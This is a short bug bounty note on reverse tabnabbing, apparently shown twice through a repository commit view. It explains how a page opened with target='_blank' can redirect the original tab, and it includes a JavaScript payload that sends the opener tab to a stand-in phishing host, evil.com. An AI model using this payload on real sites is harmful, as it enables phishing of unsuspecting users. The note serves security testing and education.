AllAboutBugBounty/Misc/Tabnabbing.md

# Tabnabbing
## Introduction
When you open a link in a new tab ( target="_blank" ), the page that opens in a new tab can access the initial tab and change it's location using the window.opener property.

## How to Find
```html
<a href="..." target="_blank" rel="" />  

<a href="..." target="_blank" />
```

## How to Exploit
1. Attacker posts a link to a website under his control that contains the following JS code:
    ```html
    <html>
    <script>
    if (window.opener) window.opener.parent.location.replace('http://evil.com');
    if (window.parent != window) window.parent.location.replace('http://evil.com');
    </script>
    </html>
    ```
2. He tricks the victim into visiting the link, which is opened in the browser in a new tab.
3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website.
Added 4 tips to misc folders 2021-02-09 10:29:07 +00:00			`# Tabnabbing`
			`## Introduction`
			`When you open a link in a new tab ( target="_blank" ), the page that opens in a new tab can access the initial tab and change it's location using the window.opener property.`

			`## How to Find`
			```html
			`<a href="..." target="_blank" rel="" />`

			`<a href="..." target="_blank" />`
			```

			`## How to Exploit`
			`1. Attacker posts a link to a website under his control that contains the following JS code:`
			```html
			`<html>`
			`<script>`
			`if (window.opener) window.opener.parent.location.replace('http://evil.com');`
			`if (window.parent != window) window.parent.location.replace('http://evil.com');`
			`</script>`
			`</html>`
			```
			`2. He tricks the victim into visiting the link, which is opened in the browser in a new tab.`
			`3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website.`